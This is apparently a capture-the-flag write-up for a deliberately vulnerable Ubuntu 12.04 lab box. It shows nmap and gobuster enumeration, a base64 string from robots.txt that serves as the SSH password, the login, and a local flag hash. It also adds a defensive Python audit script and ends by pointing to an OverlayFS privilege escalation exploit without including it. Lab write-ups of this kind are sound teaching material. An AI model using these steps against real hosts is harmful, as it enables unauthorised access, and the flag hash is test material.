Pwned Date - 5th July 2022

Enumeration

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
|   2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
|_  256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Hello Pentester!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Browsing to port 80 shows a webpage, and viewing the page source reveals the username itsskv.

Directory fuzzing turned up /robots.txt:

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u http://192.168.81.92/ -w /usr/share/wordlists/dirb/common.txt -q -t 200
/.htpasswd            (Status: 403) [Size: 290]
/.hta                 (Status: 403) [Size: 285]
/.htaccess            (Status: 403) [Size: 290]
/cgi-bin/             (Status: 403) [Size: 289]
/index                (Status: 200) [Size: 2333]
/index.html           (Status: 200) [Size: 2333]
/robots               (Status: 200) [Size: 53]  
/robots.txt           (Status: 200) [Size: 53]  
/server-status        (Status: 403) [Size: 294]

Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=

After base64-decoding, it is just a link to the YouTube channel https://www.youtube.com/c/cybersploit:

cybersploit{youtube.com/c/cybersploit}
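
An added example, not part of the original write-up: a pre-deployment audit that scans served files for the two leaks found above, HTML comments and base64 tokens that decode to readable text. The sample site content and the function names are constructed for illustration, and the exact form of the comment on the target is an assumption.

```python
import base64
import binascii
import re

# Runs of base64 alphabet at least 16 characters long, with optional padding.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
HTML_COMMENT = re.compile(r"<!--(.*?)-->", re.DOTALL)


def decode_if_text(token):
    """Return the decoded string if token is valid base64 of printable ASCII, else None."""
    if len(token) % 4:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    if raw and all(0x20 <= b < 0x7F for b in raw):
        return raw.decode("ascii")
    return None


def audit(path, body):
    """Return (path, kind, detail) findings for one served file."""
    findings = []
    for comment in HTML_COMMENT.findall(body):
        if comment.strip():
            findings.append((path, "html-comment", comment.strip()))
    for match in B64_TOKEN.finditer(body):
        decoded = decode_if_text(match.group(0))
        if decoded is not None:
            findings.append((path, "base64-text", decoded))
    return findings


# Constructed sample content modelled on what this write-up found;
# the comment's exact wording is an assumption.
SAMPLE_SITE = {
    "/index.html": "<html><body><h1>Hello Pentester!</h1>\n"
                   "<!-- username: itsskv -->\n</body></html>",
    "/robots.txt": "Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=\n",
}

if __name__ == "__main__":
    for path, body in SAMPLE_SITE.items():
        for finding in audit(path, body):
            print(*finding, sep=" | ")
```

Any base64-text finding in a publicly served file deserves a manual look, since encoding is not protection for a credential.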

Exploitation

And that cybersploit{youtube.com/c/cybersploit} is actually the password; I was stunned too.

┌──(kali㉿VirtualBox)-[~]
└─$ ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2017.

itsskv@cybersploit-CTF:~$ whoami
itsskv
itsskv@cybersploit-CTF:~$ cat local.txt
7c45634ebf5ab293ee75d93484e9c382

Privilege Escalation

itsskv@cybersploit-CTF:/home/cybersploit$ uname -a
Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 athlon i386 GNU/Linux

itsskv@cybersploit-CTF:/home/cybersploit$ cat /etc/issue
Ubuntu 12.04.5 LTS \n \l

So this version of Ubuntu is pretty old and is vulnerable to the OverlayFS privilege escalation exploit:

Offensive Security's Exploit Database Archive

Copy the whole script as ofs.c and upload to the target at /tmp